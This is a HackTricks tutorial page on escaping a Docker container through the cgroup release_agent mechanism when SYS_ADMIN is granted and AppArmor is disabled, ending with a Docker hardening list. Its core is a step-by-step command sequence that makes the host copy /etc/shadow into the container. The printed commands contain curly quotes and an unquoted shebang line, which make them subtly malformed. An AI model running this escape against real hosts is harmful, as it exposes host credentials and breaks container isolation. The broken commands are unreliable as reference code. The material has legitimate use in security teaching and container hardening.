hacktricks/linux-unix/privilege-escalation/escaping-from-a-docker-container.md

43 lines
1.4 KiB
Markdown
Raw Normal View History

2020-08-26 15:52:43 +00:00
# Escaping from a Docker container
### SYS\_ADMIN capability and AppArmor disabled
{% hint style="info" %}
Note that these aren't default settings
{% endhint %}
```text
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
```
Then in the container, we are going to run these commands.
```text
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n s/.*\perdir=\([^,]*\).*/\1/p /etc/mtab`
echo “$host_path/cmd” > /tmp/cgrp/release_agent
echo #!/bin/sh > /cmd
echo “cat /etc/shadow > $host_path/shadow” >> /cmd
chmod a+x /cmd
sh -c “echo \$\$ > /tmp/cgrp/x/cgroup.procs”
```
Once you execute the above commands, you can see the host OSs passwords in /shadow folder
```text
cat /shadow
```
As we can see we were able to break out of the container. Suffice to say, we abused misconfigurations to escape a container.
This wouldnt have happened if the non-root user was used, SYS\_ADMIN and AppArmor profile wasnt disabled.
In short,
1. Do not use privileged flag, it disables all the security mechanisms placed by docker.
2. Do not mount root volumes into the containers.
3. Do not mount docker.sock inside the containers.
4. Default docker settings are sane, please do not disable them or add more capabilities.
5. Use SecComp and AppArmor profiles to harden the container.
6. Do not run containers as the root user.